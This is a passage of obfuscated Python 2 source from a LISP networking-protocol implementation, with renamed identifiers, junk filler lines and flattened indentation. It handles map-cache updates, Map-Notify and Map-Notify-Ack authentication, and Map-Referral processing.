if ( len ( IiiiiII1i . rloc_set ) != 0 and iiI . rloc_count == 0 ) :
IiiiiII1i . rloc_set = [ ]
IiiiiII1i . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , IiiiiII1i )
lprint ( "Update {} map-cache entry with no RLOC-set" . format ( green ( IiiiiII1i . print_eid_tuple ( ) , False ) ) )
if 41 - 41: Ii1I % Ii1I * oO0o - I11i + iIii1I11I1II1 . ooOoO0o
continue
if 30 - 30: Ii1I * iII111i . II111iiii / i1IIi
if 77 - 77: oO0o . IiII + I1ii11iIi11i . i1IIi
I1i = IiiiiII1i . rtrs_in_rloc_set ( )
if 16 - 16: I1ii11iIi11i - I1ii11iIi11i % i11iIiiIii * Oo0Ooo
if 1 - 1: ooOoO0o % I1Ii111 - OoO0O00 + OoO0O00
if 99 - 99: oO0o
if 39 - 39: i1IIi
if 32 - 32: IiII . ooOoO0o / OoO0O00 / iII111i . iIii1I11I1II1 % IiII
for oOoOoO0O in range ( iiI . rloc_count ) :
iIii1IiIiI = lisp_rloc_record ( )
oO0oOOoo0OO0 = iIii1IiIiI . decode ( oO0oOOoo0OO0 , None )
iIii1IiIiI . print_record ( " " )
if ( iiI . group . is_null ( ) ) : continue
if ( iIii1IiIiI . rle == None ) : continue
if 28 - 28: I1Ii111 + OoooooooOO + IiII . ooOoO0o . I1IiiI / oO0o
if 66 - 66: Ii1I - I11i + Oo0Ooo . ooOoO0o
if 89 - 89: IiII . II111iiii / OoO0O00 + I1ii11iIi11i * i11iIiiIii
if 85 - 85: o0oOOo0O0Ooo - Oo0Ooo / I1Ii111
if 100 - 100: OoO0O00 * iIii1I11I1II1 - IiII . i1IIi % i11iIiiIii % Oo0Ooo
i1I1IiiIi = IiiiiII1i . rloc_set [ 0 ] . stats if len ( IiiiiII1i . rloc_set ) != 0 else None
if 12 - 12: oO0o / ooOoO0o
if 3 - 3: I1IiiI % OoO0O00
if 18 - 18: I1ii11iIi11i * I11i
if 57 - 57: o0oOOo0O0Ooo % I1IiiI * i11iIiiIii - I1ii11iIi11i + I1IiiI % ooOoO0o
oOo00O = lisp_rloc ( )
oOo00O . store_rloc_from_record ( iIii1IiIiI , None , IiiiiII1i . mapping_source )
if ( i1I1IiiIi != None ) : oOo00O . stats = copy . deepcopy ( i1I1IiiIi )
if 10 - 10: OoooooooOO % iII111i / IiII
if ( I1i and oOo00O . is_rtr ( ) == False ) : continue
if 64 - 64: ooOoO0o % O0 / oO0o
IiiiiII1i . rloc_set = [ oOo00O ]
IiiiiII1i . build_best_rloc_set ( )
lisp_write_ipc_map_cache ( True , IiiiiII1i )
if 21 - 21: i11iIiiIii . o0oOOo0O0Ooo
lprint ( "Update {} map-cache entry with RLE {}" . format ( green ( IiiiiII1i . print_eid_tuple ( ) , False ) ,
# Oo0Ooo . OoOoOO00 % oO0o % Oo0Ooo % O0
oOo00O . rle . print_rle ( False , True ) ) )
if 51 - 51: IiII % IiII + OOooOOo . II111iiii / I1ii11iIi11i
if 4 - 4: o0oOOo0O0Ooo % I1IiiI * o0oOOo0O0Ooo * OoOoOO00 - Ii1I
return
if 61 - 61: OoooooooOO - OoOoOO00 . O0 / ooOoO0o . Ii1I
if 41 - 41: Oo0Ooo / OoOoOO00 % I1Ii111 - O0
if 19 - 19: I1IiiI % I1Ii111 - O0 . iIii1I11I1II1 . I11i % O0
if 88 - 88: ooOoO0o
if 52 - 52: iIii1I11I1II1 % ooOoO0o * iIii1I11I1II1
if 20 - 20: i11iIiiIii * I11i
if 29 - 29: IiII / OOooOOo
if 39 - 39: O0 + II111iiii
def lisp_process_map_notify ( lisp_sockets , orig_packet , source ) :
IiiiiIiI1ii = lisp_map_notify ( "" )
IIii1i = IiiiiIiI1ii . decode ( orig_packet )
if ( IIii1i == None ) :
lprint ( "Could not decode Map-Notify packet" )
return
if 94 - 94: OOooOOo % I1ii11iIi11i % O0 + iII111i
if 62 - 62: iIii1I11I1II1 . OoOoOO00 / iIii1I11I1II1 + IiII
IiiiiIiI1ii . print_notify ( )
if 31 - 31: Ii1I . OoO0O00 . Ii1I + OoO0O00 * iIii1I11I1II1 . iII111i
if 42 - 42: O0 / oO0o % O0 . i1IIi % OOooOOo
if 13 - 13: I1IiiI % ooOoO0o + OOooOOo
if 91 - 91: oO0o - ooOoO0o
if 20 - 20: i1IIi . IiII / o0oOOo0O0Ooo / I11i
IiII1iiI = source . print_address ( )
if ( IiiiiIiI1ii . alg_id != 0 or IiiiiIiI1ii . auth_len != 0 ) :
o00oO0Oo = None
for ii1i1I1111ii in lisp_map_servers_list :
if ( ii1i1I1111ii . find ( IiII1iiI ) == - 1 ) : continue
o00oO0Oo = lisp_map_servers_list [ ii1i1I1111ii ]
if 27 - 27: ooOoO0o . ooOoO0o - Ii1I % i11iIiiIii
if ( o00oO0Oo == None ) :
lprint ( ( " Could not find Map-Server {} to authenticate " + "Map-Notify" ) . format ( IiII1iiI ) )
if 74 - 74: I1Ii111 - II111iiii % o0oOOo0O0Ooo
return
if 7 - 7: I1IiiI + OoooooooOO + o0oOOo0O0Ooo . OoooooooOO
if 29 - 29: iII111i * O0 + I1IiiI * IiII + iII111i - IiII
o00oO0Oo . map_notifies_received += 1
if 38 - 38: I1ii11iIi11i - Ii1I % OoooooooOO
IIIIi1Iiii = lisp_verify_auth ( IIii1i , IiiiiIiI1ii . alg_id ,
IiiiiIiI1ii . auth_data , o00oO0Oo . password )
if 43 - 43: iIii1I11I1II1 / OoOoOO00
lprint ( " Authentication {} for Map-Notify" . format ( "succeeded" if IIIIi1Iiii else "failed" ) )
if 13 - 13: o0oOOo0O0Ooo / I1Ii111
if ( IIIIi1Iiii == False ) : return
else :
o00oO0Oo = lisp_ms ( IiII1iiI , None , "" , 0 , "" , False , False , False , False , 0 , 0 , 0 ,
None )
if 67 - 67: OoooooooOO . oO0o * OoOoOO00 - OoooooooOO
if 32 - 32: oO0o
if 72 - 72: I1IiiI
if 34 - 34: ooOoO0o % II111iiii / ooOoO0o
if 87 - 87: Oo0Ooo
if 7 - 7: iIii1I11I1II1
oO0oOOoo0OO0 = IiiiiIiI1ii . eid_records
if ( IiiiiIiI1ii . record_count == 0 ) :
lisp_send_map_notify_ack ( lisp_sockets , oO0oOOoo0OO0 , IiiiiIiI1ii , o00oO0Oo )
return
if 85 - 85: iIii1I11I1II1 . O0
if 43 - 43: II111iiii / OoOoOO00 + OOooOOo % Oo0Ooo * OOooOOo
if 62 - 62: ooOoO0o * OOooOOo . I11i + Oo0Ooo - I1Ii111
if 48 - 48: I1Ii111 * Oo0Ooo % OoO0O00 % Ii1I
if 8 - 8: OoO0O00 . OoO0O00
if 29 - 29: I11i + OoooooooOO % o0oOOo0O0Ooo - I1Ii111
if 45 - 45: II111iiii - OOooOOo / oO0o % O0 . iII111i . iII111i
if 82 - 82: iIii1I11I1II1 % Oo0Ooo * i1IIi - I1Ii111 - I1ii11iIi11i / iII111i
iiI = lisp_eid_record ( )
IIii1i = iiI . decode ( oO0oOOoo0OO0 )
if ( IIii1i == None ) : return
if 24 - 24: IiII
iiI . print_record ( " " , False )
if 95 - 95: IiII + OoOoOO00 * OOooOOo
for oOoOoO0O in range ( iiI . rloc_count ) :
iIii1IiIiI = lisp_rloc_record ( )
IIii1i = iIii1IiIiI . decode ( IIii1i , None )
if ( IIii1i == None ) :
lprint ( " Could not decode RLOC-record in Map-Notify packet" )
return
if 92 - 92: OoOoOO00 + ooOoO0o . iII111i
iIii1IiIiI . print_record ( " " )
if 59 - 59: iIii1I11I1II1 % I1Ii111 + I1ii11iIi11i . OoOoOO00 * Oo0Ooo / I1Ii111
if 41 - 41: i1IIi / IiII
if 73 - 73: o0oOOo0O0Ooo % ooOoO0o
if 72 - 72: OoO0O00 * OoOoOO00 % I1IiiI - OOooOOo . Oo0Ooo
if 70 - 70: ooOoO0o . o0oOOo0O0Ooo * II111iiii - O0
if ( iiI . group . is_null ( ) == False ) :
if 74 - 74: oO0o % I1IiiI / oO0o / Oo0Ooo / ooOoO0o
if 29 - 29: ooOoO0o + iIii1I11I1II1 + OoO0O00 - o0oOOo0O0Ooo
if 74 - 74: II111iiii - II111iiii + ooOoO0o + Oo0Ooo % iIii1I11I1II1
if 90 - 90: oO0o / o0oOOo0O0Ooo . o0oOOo0O0Ooo % OoOoOO00 / IiII
if 13 - 13: oO0o + IiII
lprint ( "Send {} Map-Notify IPC message to ITR process" . format ( green ( iiI . print_eid_tuple ( ) , False ) ) )
if 36 - 36: oO0o - OoOoOO00 . O0 % IiII
if 65 - 65: Oo0Ooo - i11iIiiIii * OoOoOO00 . I1Ii111 . iIii1I11I1II1
OoOO0o00OOO0o = lisp_control_packet_ipc ( orig_packet , IiII1iiI , "lisp-itr" , 0 )
lisp_ipc ( OoOO0o00OOO0o , lisp_sockets [ 2 ] , "lisp-core-pkt" )
if 48 - 48: iIii1I11I1II1 - oO0o / OoO0O00 + O0 . Ii1I + I1Ii111
if 17 - 17: OoOoOO00 . Oo0Ooo - I1Ii111 / I1Ii111 + I11i % i1IIi
if 31 - 31: OoooooooOO . O0 / OoO0O00 . I1Ii111
if 41 - 41: OoooooooOO + iII111i . OOooOOo
if 73 - 73: oO0o + i1IIi + i11iIiiIii / I1ii11iIi11i
lisp_send_map_notify_ack ( lisp_sockets , oO0oOOoo0OO0 , IiiiiIiI1ii , o00oO0Oo )
return
if 100 - 100: I1IiiI % ooOoO0o % OoooooooOO / i11iIiiIii + i11iIiiIii % IiII
if 39 - 39: Ii1I % o0oOOo0O0Ooo + OOooOOo / iIii1I11I1II1
if 40 - 40: iIii1I11I1II1 / iII111i % OOooOOo % i11iIiiIii
if 57 - 57: II111iiii % OoO0O00 * i1IIi
if 19 - 19: ooOoO0o . iIii1I11I1II1 + I1ii11iIi11i + I1ii11iIi11i / o0oOOo0O0Ooo . Oo0Ooo
if 9 - 9: II111iiii % OoooooooOO
if 4 - 4: i1IIi * i11iIiiIii % OoooooooOO + OoOoOO00 . oO0o
if 95 - 95: I1ii11iIi11i * OoOoOO00 % o0oOOo0O0Ooo / O0 + ooOoO0o % OOooOOo
def lisp_process_map_notify_ack ( packet , source ) :
IiiiiIiI1ii = lisp_map_notify ( "" )
packet = IiiiiIiI1ii . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Notify-Ack packet" )
return
if 48 - 48: i1IIi + IiII - iIii1I11I1II1 . i11iIiiIii % OOooOOo + I1ii11iIi11i
if 95 - 95: ooOoO0o + OoOoOO00 . II111iiii + Ii1I
IiiiiIiI1ii . print_notify ( )
if 81 - 81: OoooooooOO / OOooOOo / Oo0Ooo
if 26 - 26: iII111i
if 93 - 93: Oo0Ooo + I1IiiI % OoOoOO00 / OOooOOo / I1ii11iIi11i
if 6 - 6: IiII
if 68 - 68: Oo0Ooo
if ( IiiiiIiI1ii . record_count < 1 ) :
lprint ( "No EID-prefix found, cannot authenticate Map-Notify-Ack" )
return
if 83 - 83: OOooOOo / iIii1I11I1II1 . OoO0O00 - oO0o % Oo0Ooo
if 30 - 30: Ii1I . OoOoOO00 / oO0o . OoO0O00
iiI = lisp_eid_record ( )
if 93 - 93: i11iIiiIii
if ( iiI . decode ( IiiiiIiI1ii . eid_records ) == None ) :
lprint ( "Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack" )
return
if 33 - 33: i1IIi % OoooooooOO + Oo0Ooo % I1IiiI / ooOoO0o
iiI . print_record ( " " , False )
if 40 - 40: IiII % IiII
I11i11i1 = iiI . print_eid_tuple ( )
if 9 - 9: I1IiiI * i1IIi + OOooOOo * OoOoOO00
if 8 - 8: iII111i
if 51 - 51: I1IiiI
if 72 - 72: ooOoO0o / I1ii11iIi11i . Ii1I * iII111i . iIii1I11I1II1
if ( IiiiiIiI1ii . alg_id != LISP_NONE_ALG_ID and IiiiiIiI1ii . auth_len != 0 ) :
oO00Oooo0o0o0 = lisp_sites_by_eid . lookup_cache ( iiI . eid , True )
if ( oO00Oooo0o0o0 == None ) :
i1i1IiIIIiI = bold ( "Site not found" , False )
lprint ( ( "{} for EID {}, cannot authenticate Map-Notify-Ack" ) . format ( i1i1IiIIIiI , green ( I11i11i1 , False ) ) )
if 35 - 35: OoO0O00 . OoOoOO00 % O0 * OoO0O00
return
if 68 - 68: OOooOOo
iIiOo0OOOOo = oO00Oooo0o0o0 . site
if 87 - 87: IiII * IiII - OoO0O00 / I1ii11iIi11i + OOooOOo / i11iIiiIii
if 21 - 21: o0oOOo0O0Ooo / oO0o + oO0o + Oo0Ooo / o0oOOo0O0Ooo
if 39 - 39: i11iIiiIii - OoO0O00 - i11iIiiIii / OoooooooOO
if 15 - 15: i1IIi . iII111i + IiII / I1ii11iIi11i - i1IIi / iII111i
iIiOo0OOOOo . map_notify_acks_received += 1
if 27 - 27: OoOoOO00 / OoooooooOO + i1IIi % iIii1I11I1II1 / OoO0O00
IIIiI1i = IiiiiIiI1ii . key_id
if ( iIiOo0OOOOo . auth_key . has_key ( IIIiI1i ) ) :
IIii1 = iIiOo0OOOOo . auth_key [ IIIiI1i ]
else :
IIii1 = ""
if 73 - 73: I1ii11iIi11i / OoOoOO00 / IiII + oO0o
if 73 - 73: I11i * o0oOOo0O0Ooo * I1IiiI . OoooooooOO % I1Ii111
IIIIi1Iiii = lisp_verify_auth ( packet , IiiiiIiI1ii . alg_id ,
IiiiiIiI1ii . auth_data , IIii1 )
if 9 - 9: oO0o % I1Ii111 . O0 + I1ii11iIi11i - Ii1I - I1ii11iIi11i
IIIiI1i = "key-id {}" . format ( IIIiI1i ) if IIIiI1i == IiiiiIiI1ii . key_id else "bad key-id {}" . format ( IiiiiIiI1ii . key_id )
if 57 - 57: i11iIiiIii
if 21 - 21: iIii1I11I1II1 / I1IiiI / iII111i
lprint ( " Authentication {} for Map-Notify-Ack, {}" . format ( "succeeded" if IIIIi1Iiii else "failed" , IIIiI1i ) )
if 19 - 19: Oo0Ooo / iIii1I11I1II1 / I11i
if ( IIIIi1Iiii == False ) : return
if 71 - 71: iIii1I11I1II1 * I1IiiI
if 35 - 35: O0
if 10 - 10: Ii1I - I1Ii111 / Oo0Ooo + O0
if 67 - 67: Ii1I % i11iIiiIii . Oo0Ooo
if 78 - 78: I1IiiI - iIii1I11I1II1
if ( IiiiiIiI1ii . retransmit_timer ) : IiiiiIiI1ii . retransmit_timer . cancel ( )
if 20 - 20: i11iIiiIii % I1IiiI % OoOoOO00
iIi11I11I1i = source . print_address ( )
ii1i1I1111ii = IiiiiIiI1ii . nonce_key
if 85 - 85: I11i + OoOoOO00 * O0 * O0
if ( lisp_map_notify_queue . has_key ( ii1i1I1111ii ) ) :
IiiiiIiI1ii = lisp_map_notify_queue . pop ( ii1i1I1111ii )
if ( IiiiiIiI1ii . retransmit_timer ) : IiiiiIiI1ii . retransmit_timer . cancel ( )
lprint ( "Dequeue Map-Notify from retransmit queue, key is: {}" . format ( ii1i1I1111ii ) )
if 92 - 92: i11iIiiIii
else :
lprint ( "Map-Notify with nonce 0x{} queue entry not found for {}" . format ( IiiiiIiI1ii . nonce_key , red ( iIi11I11I1i , False ) ) )
if 16 - 16: I11i . ooOoO0o - Oo0Ooo / OoO0O00 . i1IIi
if 59 - 59: ooOoO0o - ooOoO0o % I11i + OoO0O00
return
if 88 - 88: Ii1I - ooOoO0o . Oo0Ooo
if 83 - 83: I11i + Oo0Ooo . I1ii11iIi11i * I1ii11iIi11i
if 80 - 80: i1IIi * I11i - OOooOOo / II111iiii * iIii1I11I1II1
if 42 - 42: OoOoOO00 . I11i % II111iiii
if 19 - 19: OoooooooOO
if 31 - 31: I11i . OoOoOO00 - O0 * iII111i % I1Ii111 - II111iiii
if 21 - 21: OOooOOo . Oo0Ooo - i1IIi
if 56 - 56: I11i
def lisp_map_referral_loop ( mr , eid , group , action , s ) :
if ( action not in ( LISP_DDT_ACTION_NODE_REFERRAL ,
LISP_DDT_ACTION_MS_REFERRAL ) ) : return ( False )
if 24 - 24: I1IiiI . I1IiiI % ooOoO0o
if ( mr . last_cached_prefix [ 0 ] == None ) : return ( False )
if 32 - 32: OOooOOo / i1IIi / OOooOOo
if 97 - 97: ooOoO0o * Oo0Ooo * OoooooooOO * I1IiiI
if 45 - 45: Oo0Ooo
if 27 - 27: oO0o / IiII - iIii1I11I1II1 / o0oOOo0O0Ooo % OOooOOo * iIii1I11I1II1
i1I1i1iI1iI1 = False
if ( group . is_null ( ) == False ) :
i1I1i1iI1iI1 = mr . last_cached_prefix [ 1 ] . is_more_specific ( group )
if 40 - 40: oO0o - II111iiii * OOooOOo % OoooooooOO
if ( i1I1i1iI1iI1 == False ) :
i1I1i1iI1iI1 = mr . last_cached_prefix [ 0 ] . is_more_specific ( eid )
if 52 - 52: OOooOOo + OoO0O00
if 96 - 96: OOooOOo % O0 - Oo0Ooo % oO0o / I1IiiI . i1IIi
if ( i1I1i1iI1iI1 ) :
Oo00O0o = lisp_print_eid_tuple ( eid , group )
iII1 = lisp_print_eid_tuple ( mr . last_cached_prefix [ 0 ] ,
mr . last_cached_prefix [ 1 ] )
if 42 - 42: O0 * iII111i . i1IIi / i11iIiiIii + Ii1I
lprint ( ( "Map-Referral prefix {} from {} is not more-specific " + "than cached prefix {}" ) . format ( green ( Oo00O0o , False ) , s ,
# Oo0Ooo % OoOoOO00 . i11iIiiIii / I1Ii111 - Oo0Ooo
iII1 ) )
if 24 - 24: iIii1I11I1II1
return ( i1I1i1iI1iI1 )
if 79 - 79: IiII - Oo0Ooo - iIii1I11I1II1 % OoO0O00 - iIii1I11I1II1
if 6 - 6: OoO0O00
if 62 - 62: Ii1I
if 11 - 11: I1Ii111 + I1IiiI - OOooOOo
if 56 - 56: II111iiii + IiII * iIii1I11I1II1 - i1IIi + iIii1I11I1II1
if 98 - 98: Oo0Ooo . iIii1I11I1II1
if 12 - 12: I11i - i11iIiiIii * OoOoOO00 - OoOoOO00 * II111iiii
def lisp_process_map_referral ( lisp_sockets , packet , source ) :
if 45 - 45: I1ii11iIi11i - iIii1I11I1II1 . Ii1I * Oo0Ooo - OoO0O00
O0OOoOoOO = lisp_map_referral ( )
packet = O0OOoOoOO . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode Map-Referral packet" )
return
if 74 - 74: I1IiiI / o0oOOo0O0Ooo
O0OOoOoOO . print_map_referral ( )
if 53 - 53: iIii1I11I1II1 * oO0o
IiII1iiI = source . print_address ( )
oOO000 = O0OOoOoOO . nonce
if 43 - 43: IiII * Oo0Ooo / OOooOOo % oO0o
if 11 - 11: OoOoOO00 * Oo0Ooo / I11i * OOooOOo
if 15 - 15: ooOoO0o - OOooOOo / OoooooooOO
if 41 - 41: OoOoOO00 . iII111i . i1IIi + oO0o
for IiIIi1IiiIiI in range ( O0OOoOoOO . record_count ) :
iiI = lisp_eid_record ( )
packet = iiI . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode EID-record in Map-Referral packet" )
return
if 60 - 60: oO0o * I1Ii111
iiI . print_record ( " " , True )
if 81 - 81: oO0o - OOooOOo - oO0o
if 54 - 54: oO0o % I11i
if 71 - 71: oO0o / I1ii11iIi11i . Ii1I % II111iiii
if 22 - 22: iIii1I11I1II1 - OoooooooOO
ii1i1I1111ii = str ( oOO000 )
if ( ii1i1I1111ii not in lisp_ddt_map_requestQ ) :
lprint ( ( "Map-Referral nonce 0x{} from {} not found in " + "Map-Request queue, EID-record ignored" ) . format ( lisp_hex_string ( oOO000 ) , IiII1iiI ) )
if 8 - 8: ooOoO0o % i11iIiiIii
if 41 - 41: I1Ii111 . ooOoO0o - i11iIiiIii + Ii1I . OOooOOo . OoOoOO00
continue
if 70 - 70: i1IIi % OoOoOO00 / iII111i + i11iIiiIii % ooOoO0o + IiII
O0o00000o0O = lisp_ddt_map_requestQ [ ii1i1I1111ii ]
if ( O0o00000o0O == None ) :
lprint ( ( "No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored" ) . format ( lisp_hex_string ( oOO000 ) , IiII1iiI ) )
if 58 - 58: OOooOOo / i11iIiiIii . Oo0Ooo % iII111i
continue
if 92 - 92: OoOoOO00 / ooOoO0o % iII111i / iIii1I11I1II1
if 73 - 73: O0 % i11iIiiIii
if 16 - 16: O0
if 15 - 15: i1IIi % i11iIiiIii
if 18 - 18: Ii1I . OoO0O00 . iII111i * oO0o + O0
if 35 - 35: OoOoOO00 . oO0o / II111iiii
if ( lisp_map_referral_loop ( O0o00000o0O , iiI . eid , iiI . group ,
iiI . action , IiII1iiI ) ) :
O0o00000o0O . dequeue_map_request ( )
continue
if 97 - 97: Ii1I + I1Ii111 / II111iiii
if 14 - 14: iII111i / IiII / oO0o
O0o00000o0O . last_cached_prefix [ 0 ] = iiI . eid
O0o00000o0O . last_cached_prefix [ 1 ] = iiI . group
if 55 - 55: OoO0O00 % O0
if 92 - 92: OoooooooOO / O0
if 14 - 14: i11iIiiIii
if 43 - 43: OOooOOo
I1i1 = False
OOoO = lisp_referral_cache_lookup ( iiI . eid , iiI . group ,
True )
if ( OOoO == None ) :
I1i1 = True
OOoO = lisp_referral ( )
OOoO . eid = iiI . eid
OOoO . group = iiI . group
if ( iiI . ddt_incomplete == False ) : OOoO . add_cache ( )
elif ( OOoO . referral_source . not_set ( ) ) :
lprint ( "Do not replace static referral entry {}" . format ( green ( OOoO . print_eid_tuple ( ) , False ) ) )
if 79 - 79: iII111i % Oo0Ooo . i1IIi % ooOoO0o
O0o00000o0O . dequeue_map_request ( )
continue
if 93 - 93: OoOoOO00
if 49 - 49: i1IIi * OOooOOo % I11i * Ii1I . I1Ii111 * iIii1I11I1II1
OOo000 = iiI . action
OOoO . referral_source = source
OOoO . referral_type = OOo000
oo0o = iiI . store_ttl ( )
OOoO . referral_ttl = oo0o
OOoO . expires = lisp_set_timestamp ( oo0o )
if 72 - 72: ooOoO0o
if 63 - 63: Oo0Ooo . OoO0O00 . OoooooooOO / i1IIi
if 53 - 53: OOooOOo * O0 . iII111i
if 3 - 3: OoooooooOO * I1Ii111 * IiII - OOooOOo * I1Ii111
o0O0oOoO0O0O = OOoO . is_referral_negative ( )
if ( OOoO . referral_set . has_key ( IiII1iiI ) ) :
ii = OOoO . referral_set [ IiII1iiI ]
if 91 - 91: Oo0Ooo / I1ii11iIi11i - Oo0Ooo
if ( ii . updown == False and o0O0oOoO0O0O == False ) :
ii . updown = True
lprint ( "Change up/down status for referral-node {} to up" . format ( IiII1iiI ) )
if 31 - 31: OoooooooOO
elif ( ii . updown == True and o0O0oOoO0O0O == True ) :
ii . updown = False
lprint ( ( "Change up/down status for referral-node {} " + "to down, received negative referral" ) . format ( IiII1iiI ) )
if 51 - 51: O0 - O0
if 64 - 64: i11iIiiIii / oO0o . oO0o - Oo0Ooo
if 48 - 48: i1IIi + I1ii11iIi11i + I1Ii111 - iII111i
if 3 - 3: i1IIi + OoooooooOO * ooOoO0o + I1Ii111 % OOooOOo / IiII
if 70 - 70: oO0o + i1IIi % o0oOOo0O0Ooo - I11i
if 74 - 74: i11iIiiIii
if 93 - 93: I1Ii111 % OOooOOo * I1IiiI % iII111i / iIii1I11I1II1 + OoO0O00
if 6 - 6: I11i
O00o0Oo = { }
for ii1i1I1111ii in OOoO . referral_set : O00o0Oo [ ii1i1I1111ii ] = None
if 62 - 62: Ii1I
if 75 - 75: o0oOOo0O0Ooo * i11iIiiIii - OoooooooOO * OOooOOo
if 11 - 11: oO0o
if 14 - 14: OoooooooOO . I1ii11iIi11i % I1IiiI / I1IiiI % Oo0Ooo
for IiIIi1IiiIiI in range ( iiI . rloc_count ) :
iIii1IiIiI = lisp_rloc_record ( )
packet = iIii1IiIiI . decode ( packet , None )
if ( packet == None ) :
lprint ( "Could not decode RLOC-record in Map-Referral packet" )
return
if 97 - 97: i1IIi
iIii1IiIiI . print_record ( " " )
if 6 - 6: Ii1I
if 43 - 43: i1IIi - Ii1I % iIii1I11I1II1 . OoO0O00 + oO0o - iIii1I11I1II1
if 17 - 17: IiII . i1IIi
if 37 - 37: OoooooooOO + Oo0Ooo - Oo0Ooo + I1ii11iIi11i . I1Ii111 / I1IiiI
oo0o00OO = iIii1IiIiI . rloc . print_address ( )
if ( OOoO . referral_set . has_key ( oo0o00OO ) == False ) :
ii = lisp_referral_node ( )
ii . referral_address . copy_address ( iIii1IiIiI . rloc )
OOoO . referral_set [ oo0o00OO ] = ii
if ( IiII1iiI == oo0o00OO and o0O0oOoO0O0O ) : ii . updown = False
else :
ii = OOoO . referral_set [ oo0o00OO ]
if ( O00o0Oo . has_key ( oo0o00OO ) ) : O00o0Oo . pop ( oo0o00OO )
if 60 - 60: I1IiiI % Ii1I / I1Ii111 + Ii1I
ii . priority = iIii1IiIiI . priority
ii . weight = iIii1IiIiI . weight
if 43 - 43: I1ii11iIi11i + I11i
if 83 - 83: II111iiii + o0oOOo0O0Ooo - I1Ii111
if 100 - 100: IiII - OoOoOO00 / I11i
if 33 - 33: I1Ii111 * OoOoOO00 . I1ii11iIi11i % I1Ii111
if 87 - 87: Oo0Ooo
for ii1i1I1111ii in O00o0Oo : OOoO . referral_set . pop ( ii1i1I1111ii )
if 65 - 65: ooOoO0o . I1IiiI
I11i11i1 = OOoO . print_eid_tuple ( )
if 51 - 51: IiII
if ( I1i1 ) :
if ( iiI . ddt_incomplete ) :
lprint ( "Suppress add {} to referral-cache" . format ( green ( I11i11i1 , False ) ) )
if 43 - 43: oO0o - I11i . i11iIiiIii
else :
lprint ( "Add {}, referral-count {} to referral-cache" . format ( green ( I11i11i1 , False ) , iiI . rloc_count ) )
if 78 - 78: i11iIiiIii + Oo0Ooo * Ii1I - o0oOOo0O0Ooo % i11iIiiIii
if 30 - 30: I1IiiI % oO0o * OoooooooOO
else :
lprint ( "Replace {}, referral-count: {} in referral-cache" . format ( green ( I11i11i1 , False ) , iiI . rloc_count ) )
if 64 - 64: I1IiiI
if 11 - 11: I1ii11iIi11i % iII111i / II111iiii % ooOoO0o % IiII
if 14 - 14: ooOoO0o / IiII . o0oOOo0O0Ooo
if 27 - 27: I1IiiI - OOooOOo . II111iiii * I1ii11iIi11i % ooOoO0o / I1IiiI
if 90 - 90: o0oOOo0O0Ooo / I1ii11iIi11i - oO0o - Ii1I - I1IiiI + I1Ii111
if 93 - 93: I1IiiI - I11i . I1IiiI - iIii1I11I1II1
if ( OOo000 == LISP_DDT_ACTION_DELEGATION_HOLE ) :
lisp_send_negative_map_reply ( O0o00000o0O . lisp_sockets , OOoO . eid ,
OOoO . group , O0o00000o0O . nonce , O0o00000o0O . itr , O0o00000o0O . sport , 15 , None , False )
O0o00000o0O . dequeue_map_request ( )
if 1 - 1: O0 . Ii1I % Ii1I + II111iiii . oO0o
if 24 - 24: o0oOOo0O0Ooo . I1Ii111 % O0
if ( OOo000 == LISP_DDT_ACTION_NOT_AUTH ) :
if ( O0o00000o0O . tried_root ) :
lisp_send_negative_map_reply ( O0o00000o0O . lisp_sockets , OOoO . eid ,
OOoO . group , O0o00000o0O . nonce , O0o00000o0O . itr , O0o00000o0O . sport , 0 , None , False )
O0o00000o0O . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( O0o00000o0O , True )
if 67 - 67: I1IiiI * Ii1I
if 64 - 64: OOooOOo
if 90 - 90: iII111i . OoOoOO00 + i1IIi % ooOoO0o * I11i + OoooooooOO
if ( OOo000 == LISP_DDT_ACTION_MS_NOT_REG ) :
if ( OOoO . referral_set . has_key ( IiII1iiI ) ) :
ii = OOoO . referral_set [ IiII1iiI ]
ii . updown = False
if 2 - 2: o0oOOo0O0Ooo . II111iiii
if ( len ( OOoO . referral_set ) == 0 ) :
O0o00000o0O . dequeue_map_request ( )
else :
lisp_send_ddt_map_request ( O0o00000o0O , False )
if 9 - 9: I1Ii111 - II111iiii + OoOoOO00 . OoO0O00
if 33 - 33: Oo0Ooo
if 12 - 12: i11iIiiIii . Oo0Ooo / OoOoOO00 + iII111i . Ii1I + ooOoO0o
if ( OOo000 in ( LISP_DDT_ACTION_NODE_REFERRAL ,
LISP_DDT_ACTION_MS_REFERRAL ) ) :
if ( O0o00000o0O . eid . is_exact_match ( iiI . eid ) ) :
if ( not O0o00000o0O . tried_root ) :
lisp_send_ddt_map_request ( O0o00000o0O , True )
else :
lisp_send_negative_map_reply ( O0o00000o0O . lisp_sockets ,
OOoO . eid , OOoO . group , O0o00000o0O . nonce , O0o00000o0O . itr ,
O0o00000o0O . sport , 15 , None , False )
O0o00000o0O . dequeue_map_request ( )
if 66 - 66: IiII
else :
lisp_send_ddt_map_request ( O0o00000o0O , False )
if 41 - 41: II111iiii + Oo0Ooo / iII111i . IiII / iII111i / I1IiiI
if 78 - 78: o0oOOo0O0Ooo % OoOoOO00 . O0
if 41 - 41: iIii1I11I1II1 . OOooOOo - Oo0Ooo % OOooOOo
if ( OOo000 == LISP_DDT_ACTION_MS_ACK ) : O0o00000o0O . dequeue_map_request ( )
if 90 - 90: i11iIiiIii + OoooooooOO - i11iIiiIii + OoooooooOO
return
if 23 - 23: i11iIiiIii - IiII - I1ii11iIi11i + I1ii11iIi11i % I1IiiI
if 79 - 79: II111iiii / OoooooooOO
if 35 - 35: i1IIi + IiII + II111iiii % OOooOOo
if 25 - 25: I11i + i11iIiiIii + O0 - Ii1I
if 69 - 69: I11i . OoOoOO00 / OOooOOo / i1IIi . II111iiii
if 17 - 17: I1Ii111
if 2 - 2: O0 % OoOoOO00 + oO0o
if 24 - 24: iII111i + iII111i - OoooooooOO % OoooooooOO * O0
def lisp_process_ecm ( lisp_sockets , packet , source , ecm_port ) :
O0ooOOo0 = lisp_ecm ( 0 )
packet = O0ooOOo0 . decode ( packet )
if ( packet == None ) :
lprint ( "Could not decode ECM packet" )
return
if 51 - 51: IiII
